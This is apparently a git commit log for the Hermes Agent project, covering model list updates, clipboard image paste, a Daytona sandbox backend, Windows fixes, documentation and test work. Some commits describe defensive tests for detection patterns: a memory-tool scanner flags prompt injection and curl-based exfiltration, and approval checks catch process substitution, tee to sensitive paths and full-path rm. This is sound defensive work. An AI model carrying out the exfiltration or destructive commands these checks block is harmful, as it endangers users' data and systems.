- Reorder GPT: 5.4-pro, 5.4, 5.3-codex
- Add qwen/qwen3.5-plus-02-15 and qwen/qwen3.5-35b-a3b
- Update z-ai/glm-4.7 → glm-5
- Update minimax/minimax-m2.1 → minimax-m2.5
2026-03-06 00:52:45 -08:00
teknium1
2387465dcc chore: add openai/gpt-5.4-pro and stepfun/step-3.5-flash to OpenRouter models 2026-03-06 00:49:25 -08:00
tars90percent
32636ecf8a Update MiniMax model ID from m2.1 to m2.5 2026-03-06 16:47:48 +08:00
ygd58
6055adbe1b fix(config): route API keys and tokens to .env instead of config.yaml 2026-03-06 08:55:36 +01:00
teknium1
ffd2f8dc50 docs: add Vision & Image Paste guide with platform compatibility
New docs page covering clipboard image paste across all platforms:
- Platform compatibility table (macOS, Linux X11/Wayland, WSL2, VSCode, SSH)
- Setup instructions per platform (xclip, wl-paste, powershell.exe)
- Explanation of terminal paste limitations and why /paste exists
- SSH workarounds (file upload, URLs, X11 forwarding, messaging)
- Keybinding reference (Alt+V, Ctrl+V, /paste) with when each works

Also updates CLI commands reference with /paste command and
Alt+V keybinding documentation.
2026-03-05 23:51:46 -08:00
teknium1
e93b4d1dcd feat: Alt+V keybinding for clipboard image paste
Alt key combos pass through all terminal emulators (sent as ESC + key),
unlike Ctrl+V which terminals intercept for text paste. This is the
reliable way to attach clipboard images on WSL2, Windows Terminal,
VSCode, and SSH sessions where Ctrl+V never reaches the application
for image-only clipboard content.

Also adds 'Paste image: Alt+V (or /paste)' hint to /help output.
2026-03-05 22:48:39 -08:00
teknium1
014a5b712d fix: prevent duplicate gateway instances from running simultaneously
start_gateway() now checks for an existing running instance via PID file
before starting. If another gateway is already running under the same
HERMES_HOME, it refuses to start with a clear error message directing the
user to 'hermes gateway restart' or 'hermes gateway stop'.

Also fixes gateway/status.py to respect the HERMES_HOME env var instead of
hardcoding ~/.hermes. This scopes the PID file per HERMES_HOME directory,
which lays the groundwork for future multi-profile support where distinct
HERMES_HOME directories can run concurrent gateway instances independently.
2026-03-05 20:35:33 -08:00
teknium1
2317d115cd fix: clipboard image paste on WSL2, Wayland, and VSCode terminal
The original implementation only supported xclip (X11), which silently
fails on WSL2 (can't access Windows clipboard for images), Wayland
desktops (xclip is X11-only), and VSCode terminal on WSL2.

Clipboard backend changes (hermes_cli/clipboard.py):
- WSL2: detect via /proc/version, use powershell.exe with .NET
  System.Windows.Forms.Clipboard to extract images as base64 PNG
- Wayland: use wl-paste with MIME type detection, auto-convert BMP
  to PNG for WSLg environments (via Pillow or ImageMagick)
- Dispatch order: WSL → Wayland → X11 (xclip), with fallthrough
- New has_clipboard_image() for lightweight clipboard checks
- Cache WSL detection result per-process

CLI changes (cli.py):
- /paste command: explicit clipboard image check for terminals where
  BracketedPaste doesn't fire (image-only clipboard in VSCode/WinTerm)
- Ctrl+V keybinding: fallback for Linux terminals where Ctrl+V sends
  raw byte instead of triggering bracketed paste

Tests: 80 tests (up from 37) covering WSL, Wayland, X11 dispatch,
BMP conversion, has_clipboard_image, and /paste command.
2026-03-05 20:22:44 -08:00
teknium1
8253b54be9 test: strengthen assertions in skill_manager + memory_tool (batch 3)
test_skill_manager_tool.py (20 weak → 0):
  - Validation error messages verified against exact strings
  - Name validation: checks specific invalid name echoed in error
  - Frontmatter validation: exact error text for missing fields,
    unclosed markers, empty content, invalid YAML
  - File path validation: traversal, disallowed dirs, root-level

test_memory_tool.py (13 weak → 0):
  - Security scan tests verify both 'Blocked' prefix AND specific
    threat pattern ID (prompt_injection, exfil_curl, etc.)
  - Invisible unicode tests verify exact codepoint strings
  - Snapshot test verifies type, header, content, and isolation
2026-03-05 18:51:43 -08:00
teknium1
5c867fd79f test: strengthen assertions across 3 more test files (batch 2)
test_run_agent.py (2 weak → 0, +13 assertions):
  - Session ID validated against actual YYYYMMDD_HHMMSS_hex format
  - API failure verifies error message propagation
  - Invalid JSON args verifies empty dict fallback + message structure
  - Context compression verifies final_response + completed flag
  - Invalid tool name retry verifies api_calls count
  - Invalid response verifies completed/failed/error structure

test_model_tools.py (3 weak → 0):
  - Unknown tool error includes tool name in message
  - Exception returns dict with 'error' key + non-empty message
  - get_all_tool_names verifies both web_search AND terminal present

test_approval.py (1 weak → 0, assert ratio 1.1 → 2.2):
  - Dangerous commands verify description content (delete, shell, drop, etc.)
  - Safe commands explicitly assert key AND desc are None
  - Pre/post condition checks for state management
2026-03-05 18:46:30 -08:00
teknium1
a44e041acf test: strengthen assertions across 7 test files (batch 1)
Replaced weak 'is not None' / '> 0' / 'len >= 1' assertions with
concrete value checks across the most flagged test files:

gateway/test_pairing.py (11 weak → 0):
  - Code assertions verify isinstance + len == CODE_LENGTH
  - Approval results verify dict structure + specific user_id/user_name
  - Added code2 != code1 check in rate_limit_expires

test_hermes_state.py (6 weak → 0):
  - ended_at verified as float timestamp
  - Search result counts exact (== 2, not >= 1)
  - Context verified as non-empty list
  - Export verified as dict, session ID verified

test_cli_init.py (4 weak → 0):
  - max_turns asserts exact value (60)
  - model asserts string with provider/name format

gateway/test_hooks.py (2 zero-assert tests → fixed):
  - test_no_handlers_for_event: verifies no handler registered
  - test_handler_error_does_not_propagate: verifies handler count + return

gateway/test_platform_base.py (9 weak image tests → fixed):
  - extract_images tests now verify actual URL and alt_text
  - truncate_message verifies content preservation after splitting

cron/test_scheduler.py (1 weak → 0):
  - resolve_origin verifies dict equality, not just existence

cron/test_jobs.py (2 weak → 0 + 4 new tests):
  - Schedule parsing verifies ISO timestamp type
  - Cron expression verifies result is valid datetime string
  - NEW: 4 tests for update_job() (was completely untested)
2026-03-05 18:39:37 -08:00
teknium1
e9f05b3524 test: comprehensive tests for model metadata + firecrawl config
model_metadata tests (61 tests, was 39):
  - Token estimation: concrete value assertions, unicode, tool_call messages,
    vision multimodal content, additive verification
  - Context length resolution: cache-over-API priority, no-base_url skips cache,
    missing context_length key in API response
  - API metadata fetch: canonical_slug aliasing, TTL expiry with time mock,
    stale cache fallback on API failure, malformed JSON resilience
  - Probe tiers: above-max returns 2M, zero returns None
  - Error parsing: Anthropic format ('X > Y maximum'), LM Studio, empty string,
    unreasonably large numbers — also fixed parser to handle Anthropic format
  - Cache: corruption resilience (garbage YAML, wrong structure), value updates,
    special chars in model names

Firecrawl config tests (8 tests, was 4):
  - Singleton caching (core purpose — verified constructor called once)
  - Constructor failure recovery (retry after exception)
  - Return value actually asserted (not just constructor args)
  - Empty string env vars treated as absent
  - Proper setup/teardown for env var isolation
2026-03-05 18:22:39 -08:00
teknium1
e2a834578d refactor: extract clipboard methods + comprehensive tests (37 tests)
Refactored image paste internals for testability:
- Extracted _try_attach_clipboard_image() method (clipboard → state)
- Extracted _build_multimodal_content() method (images → OpenAI format)
- chat() now delegates to these instead of inline logic

Tests organized in 4 levels:
  Level 1 (19 tests): Clipboard module — every platform path with
    realistic subprocess simulation (tools writing files, timeouts,
    empty files, cleanup on failure)
  Level 2 (8 tests): _build_multimodal_content — base64 encoding,
    MIME types (png/jpg/webp/unknown), missing files, multiple images,
    default question for empty text
  Level 3 (5 tests): _try_attach_clipboard_image — state management,
    counter increment/rollback, naming convention, mixed success/failure
  Level 4 (5 tests): Queue routing — tuple unpacking, command detection,
    images-only payloads, text-only payloads
2026-03-05 18:07:53 -08:00
teknium1
ffc752a79e test: improve clipboard tests with realistic scenarios and multimodal coverage
Rewrote clipboard tests from 11 shallow mocks to 21 realistic tests:
- Success paths now simulate tools actually writing files (not pre-created)
- osascript: success with PNG, success with TIFF, extraction-fail cases
- pngpaste: empty file rejection edge case
- Linux: extraction failure cleanup verification
- New TestMultimodalConversion class: base64 encoding, MIME types,
  multiple images, missing file handling, default question fallback
2026-03-05 17:58:06 -08:00
teknium1
399562a7d1 feat: clipboard image paste in CLI (Cmd+V / Ctrl+V)
Copy an image to clipboard (screenshot, browser, etc.) and paste into
the Hermes CLI. The image is saved to ~/.hermes/images/, shown as a
badge above the input ([📎 Image #1]), and sent to the model as a
base64-encoded OpenAI vision multimodal content block.

Implementation:
- hermes_cli/clipboard.py: clean module with platform-specific extraction
  - macOS: pngpaste (if installed) → osascript fallback (always available)
  - Linux: xclip (apt install xclip)
- cli.py: BracketedPaste key handler checks clipboard on every paste,
  image bar widget shows attached images, chat() converts to multimodal
  content format, Ctrl+C clears attachments

Inspired by @m0at's fork (https://github.com/m0at/hermes-agent) which
implemented image paste support for local vision models. Reimplemented
cleanly as a separate module with tests.
2026-03-05 17:55:41 -08:00
teknium1
fec8a0da72 Merge PR #296: fix(cron): close lock_fd on failed flock to prevent fd leak
Authored by alireza78a. When flock() raises on a concurrent tick, the
file descriptor was leaked because the except clause returned without
closing it. Adds lock_fd=None init and close in the except path.
2026-03-05 17:05:06 -08:00
teknium1
9f4542b3db fix: require Python 3.11+ in pyproject.toml
Was incorrectly set to >=3.10. Hermes uses tomllib and other 3.11+
features. CONTRIBUTING.md and README already say 3.11+.
2026-03-05 17:04:08 -08:00
teknium1
363633e2ba fix: allow self-hosted Firecrawl without API key + add self-hosting docs
On top of PR #460: self-hosted Firecrawl instances don't require an API
key (USE_DB_AUTHENTICATION=false), so don't force users to set a dummy
FIRECRAWL_API_KEY when FIRECRAWL_API_URL is set. Also adds a proper
self-hosting section to the configuration docs explaining what you get,
what you lose, and how to set it up (Docker stack, tradeoffs vs cloud).

Added 2 more tests (URL-only without key, neither-set raises).
2026-03-05 16:44:21 -08:00
teknium1
a41ba57a7a Merge PR #460: feat(tools): add support for self-hosted firecrawl
Authored by caentzminger. Adds optional FIRECRAWL_API_URL env var to point
the Firecrawl client at a self-hosted instance instead of the cloud API.
2026-03-05 16:41:30 -08:00
teknium1
884c8ea70a chore: add openai/gpt-5.4 to OpenRouter preferred models list 2026-03-05 16:13:45 -08:00
teknium1
c886333d32 feat: smart context length probing with persistent caching + banner display
Replaces the unsafe 128K fallback for unknown models with a descending
probe strategy (2M → 1M → 512K → 200K → 128K → 64K → 32K). When a
context-length error occurs, the agent steps down tiers and retries.
The discovered limit is cached per model+provider combo in
~/.hermes/context_length_cache.yaml so subsequent sessions skip probing.

Also parses API error messages to extract the actual context limit
(e.g. 'maximum context length is 32768 tokens') for instant resolution.

The CLI banner now displays the context window size next to the model
name (e.g. 'claude-opus-4 · 200K context · Nous Research').

Changes:
- agent/model_metadata.py: CONTEXT_PROBE_TIERS, persistent cache
  (save/load/get), parse_context_limit_from_error(), get_next_probe_tier()
- agent/context_compressor.py: accepts base_url, passes to metadata
- run_agent.py: step-down logic in context error handler, caches on success
- cli.py + hermes_cli/banner.py: context length in welcome banner
- tests: 22 new tests for probing, parsing, and caching

Addresses #132. PR #319's approach (8K default) rejected — too conservative.
2026-03-05 16:09:57 -08:00
teknium1
55b173dd03 refactor: move shutil import to module level
Cleanup on top of PR #305 — replace two inline 'import shutil as _shutil'
with a single module-level import.
2026-03-05 15:57:05 -08:00
dmahan93
9079a27814 fix: prompt box and response box span full terminal width on wide screens
- Replace hardcoded '─' * 200 horizontal rules with Window(char='─')
  so prompt_toolkit fills the entire terminal width automatically
- Use shutil.get_terminal_size().columns instead of Rich Console.width
  for response box, separator line, and input height calculation
  (more reliable inside patch_stdout context)
2026-03-05 15:57:05 -08:00
caentzminger
d7d10b14cd feat(tools): add support for self-hosted firecrawl
Adds optional FIRECRAWL_API_URL environment variable to support
self-hosted Firecrawl deployments alongside the cloud service.

- Add FIRECRAWL_API_URL to optional env vars in hermes_cli/config.py
- Update _get_firecrawl_client() in tools/web_tools.py to accept custom API URL
- Add tests for client initialization with/without URL
- Document new env var in installation and config guides
2026-03-05 16:16:18 -06:00
shitcoinsherpa
81986022b7 Add explicit encoding="utf-8" to all config/data file open() calls
On Windows, open() defaults to the system locale encoding (cp1252,
cp1254, etc.) rather than UTF-8. This breaks any file containing
non-ASCII characters, and also causes crashes when writing JSON with
ensure_ascii=False.

This adds encoding="utf-8" to open() calls in:
- gateway/run.py (config.yaml reads/writes throughout)
- gateway/config.py (gateway.json and config.yaml)
- hermes_cli/config.py (config.yaml load/save)
- hermes_cli/main.py (session export with ensure_ascii=False)
- hermes_cli/status.py (jobs.json and sessions.json)
2026-03-05 17:16:04 -05:00
shitcoinsherpa
dcba291d45 Use pywinpty instead of ptyprocess on Windows for PTY support
ptyprocess depends on Unix-only APIs (fork, openpty) and cannot work
on Windows at all. pywinpty provides a compatible PtyProcess interface
using the Windows ConPTY API.

This conditionally imports winpty.PtyProcess on Windows and
ptyprocess.PtyProcess on Unix. The pyproject.toml pty extra now uses
platform markers so the correct package is installed automatically.
2026-03-05 17:16:04 -05:00
shitcoinsherpa
48e65631f6 Fix auth store file lock for Windows (msvcrt) with reentrancy support
fcntl is not available on Windows. This adds msvcrt.locking as a
fallback for cross-process advisory locking on Windows.

msvcrt.locking is not reentrant within the same thread, unlike fcntl.flock.
This matters because resolve_codex_runtime_credentials holds the lock and
then calls _save_codex_tokens, which tries to acquire it again. Without
reentrancy tracking, this deadlocks on Windows after a 15-second timeout.

Uses threading.local() to track lock depth per thread, allowing nested
acquisitions to pass through without re-acquiring the underlying lock.

Also handles msvcrt-specific requirements: file must be opened in r+ mode
(not a+), must have at least 1 byte of content, and the file pointer must
be at position 0 before locking.
2026-03-05 17:16:03 -05:00
rovle
a6499b6107 fix(daytona): use shell timeout wrapper instead of broken SDK exec timeout
The Daytona SDK's process.exec(timeout=N) parameter is not enforced —
the server-side timeout never fires and the SDK has no client-side
fallback, causing commands to hang indefinitely.

Fix: wrap commands with timeout N sh -c '...' (coreutils) which
reliably kills the process and returns exit code 124. Added
shlex.quote for proper shell escaping and a secondary deadline (timeout + 10s) that force-stops the sandbox if the shell timeout somehow fails.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 13:12:41 -08:00
0xbyt4
14a11d24b4 fix: handle None args in build_tool_preview
When an LLM returns null/empty tool call arguments, json.loads()
produces None. build_tool_preview then crashes with
"argument of type 'NoneType' is not iterable" on the `in` check.
Return None early when args is falsy.
2026-03-05 23:09:11 +03:00
rovle
74a36b0729 docs: add Daytona to backend lists in docs
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:55:41 -08:00
rovle
efc7a7b957 fix(daytona): don't guess /root on cwd probe failure, keep constructor default; update tests to reflect this
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:49:35 -08:00
rovle
4f1464b3af fix(daytona): default disk to 10GB to match platform limit
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:37:30 -08:00
rovle
3a41079fac fix(daytona): add optional dependency group to pyproject.toml
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:13:12 -08:00
rovle
5279540bb4 fix(daytona): add missing config mappings in gateway, CLI defaults, and config display
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:12:50 -08:00
rovle
577da79a47 fix(daytona): make disk cap visible and use SDK enum for sandbox
state

- Replace logger.warning with warnings.warn for the disk cap so users
  actually see it (logger was suppressed by CLI's log level config)
- Use SandboxState enum instead of string literals in
_ensure_sandbox_ready

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:03:39 -08:00
rovle
1faa9648d3 chore(daytona): cap the disk size to current maximum on daytona sandboxes
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:43:41 -08:00
PercyDikec
ad57bf1e4b fix(cli): use correct dict key for codex auth file path in status output 2026-03-05 21:27:12 +03:00
rovle
d5efb82c7c test(daytona): add unit and integration tests for Daytona backend
Unit tests cover cwd resolution, sandbox persistence/resume, cleanup,
command execution, resource conversion, interrupt handling, retry
exhaustion, and sandbox readiness checks. Integration tests verify
basic commands, filesystem ops, session persistence, and task
isolation against a live Daytona API.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:26:22 -08:00
PercyDikec
36214d14db fix(cli): use correct visibility filter string in codex API model fetch 2026-03-05 21:12:53 +03:00
rovle
ea2f7ef2f6 docs(config): add Daytona disk limit hint and fix default cwd in example
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:22 -08:00
rovle
435530018b fix(daytona): resolve cwd by detecting home directory inside the sandbox 2026-03-05 10:02:22 -08:00
rovle
df61054a84 feat(cli): add Daytona to setup wizard, doctor, and status display
Add Daytona as a backend choice in the interactive setup wizard with
SDK installation and API key prompts. Show Daytona image in status
output and validate API key + SDK in doctor checks. Add OPTION 6
example in cli-config.yaml.example.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:22 -08:00
rovle
690b8bb563 feat(cli): add Daytona config mapping and env var sync
Wire TERMINAL_DAYTONA_IMAGE through cli.py env_mappings and
hermes_cli/config.py so `hermes config set` propagates correctly.
2026-03-05 10:02:21 -08:00
rovle
c43451a50b feat(terminal): integrate Daytona backend into tool pipeline
Add Daytona to image selection, container_config guards, environment
factory, requirements check, and diagnostics in terminal_tool.py and
file_tools.py. Also add to sandboxed-backend approval bypass.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:21 -08:00
rovle
1e312c6582 feat(environments): add Daytona cloud sandbox backend
New execution backend using the Daytona Python SDK. Supports persistent
sandboxes via stop/start lifecycle, interrupt handling, and automatic
retry on transient errors.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:21 -08:00
PercyDikec
e36c8cd49a fix: add missing re.DOTALL flag to DeepSeek V3 tool call parser 2026-03-05 20:32:38 +03:00
PercyDikec
16cb6d1a6e fix(gateway): return response from /retry handler instead of discarding it 2026-03-05 19:59:54 +03:00
Teknium
21d61bdd71 Merge pull request #307 from batuhankocyigit/patch-1
fix: correct typo 'Grup' -> 'Group' in test section headers
2026-03-05 08:54:05 -08:00
teknium1
ad9c26afb8 Merge PR #293: fix: eliminate shell noise from terminal output and fix test failures
Authored by 0xbyt4. Wraps commands with unique fence markers to isolate real output
from shell init/exit noise (oh-my-zsh, macOS session restore, etc.). Falls back to
expanded pattern-based cleaning. Also fixes BSD find fallback and test module shadowing.
2026-03-05 08:48:26 -08:00
JackTheGit
71c0cd00e5 docs: fix spelling of 'publicly' 2026-03-05 16:46:21 +00:00
teknium1
83f99d8203 Merge PR #438: fix: add missing empty-content guard after think-block stripping in retry path
Authored by PercyDikec. Fixes #437.
The retry path in _handle_max_iterations was missing the second if final_response:
guard after stripping <think> blocks, which could result in an empty assistant message
being appended to history instead of using the fallback message.
2026-03-05 08:37:49 -08:00
teknium1
6b37d38dee Merge PR #292: feat(whatsapp): native media attachments for images, videos and documents
Authored by satelerd. Adds native WhatsApp media sending for images, videos,
and documents via MEDIA: tags. Also includes conflict resolution with edit_message
feature, Telegram hint fix (only advertise supported media types), and import cleanup.
2026-03-05 08:35:13 -08:00
PercyDikec
938499ddfb fix: add missing empty-content guard after think-block stripping in retry path 2026-03-05 18:57:59 +03:00
teknium1
d92266d7c0 ci: pin tests to Python 3.11 only
The installer hardcodes PYTHON_VERSION=3.11 and creates the venv
with that version. No point testing 3.12 — halves CI time.
2026-03-05 07:55:01 -08:00
teknium1
a352b5c193 docs: remove legacy docs/ directory — all content migrated to website
Removed 10 markdown files (~4,200 lines) that have been fully migrated,
restructured, and accuracy-audited on the docs site at
hermes-agent.nousresearch.com/docs/

Left docs/README.md as a pointer to the website.
Updated CONTRIBUTING.md file tree reference.
2026-03-05 07:37:06 -08:00
teknium1
82f7483999 docs: simplify README from 1776 to 121 lines
All detailed documentation now lives at hermes-agent.nousresearch.com/docs/.
README retains: banner, badges, value proposition, feature highlights,
one-line install, getting started commands, docs site link table,
quick contributor setup, community links, and license.

Removed: 1600+ lines of inline docs covering config, messaging setup,
tools, skills, MCP, terminal backends, memory, cron, hooks, security,
TTS, browser, batch processing, RL training, manual installation,
env vars reference, file structure, and troubleshooting.
2026-03-05 07:33:07 -08:00
teknium1
56dc9277d7 ci: add test workflow for PRs and main branch
Run pytest on Python 3.11 + 3.12 for every PR and push to main.

- Uses uv for fast dependency installation
- Excludes integration tests (need real API keys/services)
- Blanks API keys as safety net against accidental real API calls
- Concurrency: cancels in-progress runs when new commits are pushed
- 10 minute timeout (tests take ~77s)
- fail-fast disabled so both Python versions run independently

GitHub's default 'require approval for first-time contributors'
means maintainers approve CI before it runs on new contributors'
PRs, preventing abuse of CI resources.
2026-03-05 07:29:16 -08:00
teknium1
d50e9bcef7 docs: add 11 new pages + expand 4 existing pages (26 → 37 total)
New pages (sourced from actual codebase):
- Security: command approval, DM pairing, container isolation, production checklist
- Session Management: resume, export, prune, search, per-platform tracking
- Context Files: AGENTS.md project context, discovery, size limits, security
- Personality: SOUL.md, 14 built-in personalities, custom definitions
- Browser Automation: Browserbase setup, 10 browser tools, stealth mode
- Image Generation: FLUX 2 Pro via FAL, aspect ratios, auto-upscaling
- Provider Routing: OpenRouter sort/only/ignore/order config
- Honcho: AI-native memory integration, setup, peer config
- Home Assistant: HASS setup, 4 HA tools, WebSocket gateway
- Batch Processing: trajectory generation, dataset format, checkpointing
- RL Training: Atropos/Tinker integration, environments, workflow

Expanded pages:
- code-execution: 51 → 195 lines (examples, limits, security, comparison table)
- delegation: 60 → 216 lines (context tips, batch mode, model override)
- cron: 88 → 273 lines (real-world examples, delivery options, expression cheat sheet)
- memory: 98 → 249 lines (best practices, capacity management, examples)
2026-03-05 07:28:41 -08:00
teknium1
c4e520fd6e docs: add documentation & housekeeping checklist to PR template
Add a second checklist section covering common oversights seen in PRs:
- Update relevant docs (README, docs/, docstrings)
- Update cli-config.yaml.example when adding config keys
- Update CONTRIBUTING.md/AGENTS.md for architecture changes
- Consider cross-platform impact (Windows/macOS)
- Update tool schemas when changing tool behavior

Each item has an 'or N/A' option so contributors aren't blocked
on items that don't apply to their change.
2026-03-05 07:23:52 -08:00
teknium1
30ff395924 feat: add issue and PR templates
Add structured GitHub templates based on analysis of 200+ closed PRs
and 50+ closed issues to improve submission quality:

Issue templates (YAML form-based):
- Bug Report: requires reproduction steps, expected/actual behavior,
  OS/Python/Hermes version. Optional root cause analysis field.
- Feature Request: requires problem/use case, links to skill-vs-tool
  guidance in CONTRIBUTING.md to reduce misguided tool PRs.
- Setup/Installation Help: requires install method, hermes doctor
  output, error logs, steps already tried.
- Template chooser config with links to Discord, docs, contributing guide.

PR template:
- Type of change selector (bug/feature/security/docs/tests/refactor/skill)
- Mandatory issue reference, changes list, testing steps
- Checklist: conventional commits, no duplicates, focused changes,
  tests pass, tests added, platform tested
- Dedicated 'New Skills' section asking if skill is broadly useful
  and properly formatted/tested

Key problems these templates address:
- Bug reports with no reproduction steps or environment info
- Duplicate/racing PRs (multiple people fixing same issue)
- Stale branches with 85+ unrelated file changes
- Junk skill PRs that should go to Skills Hub instead of bundled
- Missing tests on bug fix PRs
- No issue references on PRs
2026-03-05 07:22:39 -08:00
teknium1
f55025952d docs: reorder sidebar — Quickstart before Installation 2026-03-05 07:15:35 -08:00
teknium1
1bc45ee8fe docs: simplify installer description for getting started page 2026-03-05 07:14:13 -08:00
teknium1
19016497ef docs: fix all remaining minor accuracy issues
- updating.md: Note that 'hermes update' auto-handles config migration
- cli.md: Add summary_model to compression config, fix display config
  (add personality/compact), remove unverified pastes/ claim
- configuration.md: Add 5 missing config sections (stt, human_delay,
  code_execution, delegation, clarify), fix display defaults,
  fix reasoning_effort default to empty/unset
- messaging/index.md: Add GATEWAY_ALLOWED_USERS to security section
- skills.md: Add category field to skills_list return value
- mcp.md: Document auto-registered utility tools (resources/prompts)
- architecture.md: Fix file_tools.py reference, base_url default to None,
  synchronous agent loop pseudocode
- cli-commands.md: Fix hermes logout description
- environment-variables.md: Add HERMES_QUIET, HERMES_EXEC_ASK,
  BROWSER_INACTIVITY_TIMEOUT, GATEWAY_ALLOWED_USERS

Verification scan: 27/27 checks passed, zero issues remaining.
2026-03-05 07:00:51 -08:00
teknium1
d578d06f59 docs: comprehensive accuracy audit fixes (35+ corrections)
CRITICAL fixes:
- Installation: Remove false prerequisites (installer auto-installs everything except git)
- Tools: Remove non-existent 'web_crawl' tool from tools table
- Memory: Remove non-existent 'read' action (only add/replace/remove exist)
- Code execution: Fix 'search' to 'search_files' in sandbox tools list
- CLI commands: Fix --model/--provider/--toolsets/--verbose as chat subcommand flags

IMPORTANT fixes:
- Installation: Add missing installer features (Node.js, ripgrep, ffmpeg, skills seeding)
- Installation: Add 6 missing package extras to table (mcp, honcho, tts-premium, etc)
- Installation: Fix mkdir to include all directories the installer creates
- Quickstart: Add OpenAI Codex to provider table
- CLI: Fix all 'hermes --flag' to 'hermes chat --flag' across all docs
- Configuration: Remove non-existent --max-turns CLI flag
- Tools: Fix 'search' to 'search_files', add missing 'process' tool
- Skills: Remove skills_categories() (not a registered tool)
- Cron: Remove unsupported 'daily at 9am' schedule format
- TTS: Fix output directory to ~/.hermes/audio_cache/
- Delegation: Clarify depth limit wording
- Architecture: Fix default model, chat() signature, file names
- Contributing: Fix Python requirement from 3.11+ to 3.10+
- CLI reference: Add missing commands (login, tools, sessions subcommands)
- Env vars: Fix TERMINAL_DOCKER_IMAGE default, add HERMES_MODEL
2026-03-05 06:50:22 -08:00
Farukest
e25ad79d5d fix: use _max_tokens_param in max-iterations retry path
The retry summary in _handle_max_iterations hardcodes max_tokens instead
of calling _max_tokens_param(). For direct OpenAI API users (gpt-4o,
o-series), the correct parameter name is max_completion_tokens. The first
attempt at line 2697 already uses _max_tokens_param correctly but the
retry path at line 2743 was missed.
2026-03-05 17:49:37 +03:00
teknium1
f2624a1426 docs: remove Windows support references, recommend WSL2
- Installation: Remove PowerShell/CMD install commands, add WSL2 warning
- Quickstart: Replace PowerShell block with WSL2 tip
- Contributing: Update cross-platform section to clarify Windows unsupported
- Index: Update install description to say WSL2 instead of Windows
2026-03-05 06:36:18 -08:00
jackx707
15561ec425 feat: add WebResearchEnv RL environment for multi-step web research 2026-03-05 14:34:36 +00:00
teknium1
93d93fdea4 feat: add gateway setup wizard and update steps to landing page
- Step 4: Added 'hermes gateway setup' wizard command before gateway start
- Step 5: New 'hermes update' step for keeping the agent up to date
2026-03-05 06:33:40 -08:00
teknium1
87f4e4cb9b chore: remove Windows install options from landing page
- Remove PowerShell and CMD tabs from hero and install sections
- Add WSL to the Linux/macOS tab label
- Update Windows notice: experimental/unsupported, recommend WSL2
- Add Docs nav link pointing to /docs/
- Clean up platform detection JS (always default to linux)
2026-03-05 06:30:09 -08:00
Farukest
82cb1752d9 fix(whatsapp): replace Linux-only fuser with cross-platform port cleanup
fuser command does not exist on Windows, causing orphaned bridge processes
to never be cleaned up. On crash recovery, the port stays occupied and the
next connect() fails with address-already-in-use.

Add _kill_port_process() helper that uses netstat+taskkill on Windows and
fuser on Linux/macOS. Replace both call sites in connect() and disconnect().
2026-03-05 17:13:14 +03:00
teknium1
ada3713e77 feat: add documentation website (Docusaurus)
- 25 documentation pages covering Getting Started, User Guide, Developer Guide, and Reference
- Docusaurus with custom amber/gold theme matching the landing page branding
- GitHub Actions workflow to deploy landing page + docs to GitHub Pages
- Landing page at root, docs at /docs/ on hermes-agent.nousresearch.com
- Content extracted and restructured from existing repo docs (README, AGENTS.md, CONTRIBUTING.md, docs/)
- Auto-deploy on push to main when website/ or landingpage/ changes
2026-03-05 05:24:55 -08:00
aydnOktay
7d79ce92ac Improve type hints and error diagnostics in vision_tools 2026-03-05 16:11:59 +03:00
teknium1
1708dcd2b2 feat: implement edit_message() for Telegram/Discord/Slack and fix fallback regression
Building on PR #288's edit_message() abstraction:

- Telegram: edit_message_text() with MarkdownV2 + plain text fallback
- Discord: channel.fetch_message() + msg.edit() with length capping
- Slack: chat_update() via slack_bolt client

Also fixes the fallback regression in send_progress_messages() where
platforms that don't support editing would receive duplicated accumulated
tool lines. Now uses a can_edit flag — after the first failed edit, falls
back to sending individual lines (matching pre-PR behavior).
2026-03-05 03:47:51 -08:00
teknium1
5702eba93b Merge PR #288: feat(whatsapp): stream tool progress as a single live-updating message
Authored by satelerd. Adds edit_message() to BasePlatformAdapter and
implements it for WhatsApp via Baileys native editing. Progress messages
accumulate into a single live-updating message instead of N separate ones.

Cherry-picked from stale branch.
2026-03-05 03:44:13 -08:00
Daniel Sateler
a1767fd69c feat(whatsapp): consolidate tool progress into single editable message
Instead of sending a separate WhatsApp message for each tool call during
agent execution (N+1 messages), the first tool sends a new message and
subsequent tools edit it to append their line. Result: 1 growing progress
message + 1 final response = 2 messages instead of N+1.

Changes:
- bridge.js: Add POST /edit endpoint using Baileys message editing
- base.py: Add optional edit_message() to BasePlatformAdapter (no-op
  default, so platforms without editing support work unchanged)
- whatsapp.py: Implement edit_message() calling bridge /edit
- run.py: Rewrite send_progress_messages() to accumulate tool lines and
  edit the progress message. Falls back to sending a new message if
  edit fails (graceful degradation).

Before (5 tools = 6 messages):
  ⚕ Hermes Agent ─── 🔍 web_search... "query"
  ⚕ Hermes Agent ─── 📄 web_extract... "url"
  ⚕ Hermes Agent ─── 💻 terminal... "pip install"
  ⚕ Hermes Agent ─── ✍️ write_file... "app.py"
  ⚕ Hermes Agent ─── 💻 terminal... "python app.py"
  ⚕ Hermes Agent ─── Done! The server is running...

After (5 tools = 2 messages):
  ⚕ Hermes Agent ───
  🔍 web_search... "query"
  📄 web_extract... "url"
  💻 terminal... "pip install"
  ✍️ write_file... "app.py"
  💻 terminal... "python app.py"

  ⚕ Hermes Agent ─── Done! The server is running...

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-05 03:44:08 -08:00
teknium1
b4b426c69d test: add coverage for tee, process substitution, and full-path rm patterns
Tests for the three new dangerous command patterns added in PR #280:
- TestProcessSubstitutionPattern: 7 tests (bash/sh/zsh/ksh + safe commands)
- TestTeePattern: 7 tests (sensitive paths + safe destinations)
- TestFindExecFullPathRm: 4 tests (/bin/rm, /usr/bin/rm, bare rm, safe find)
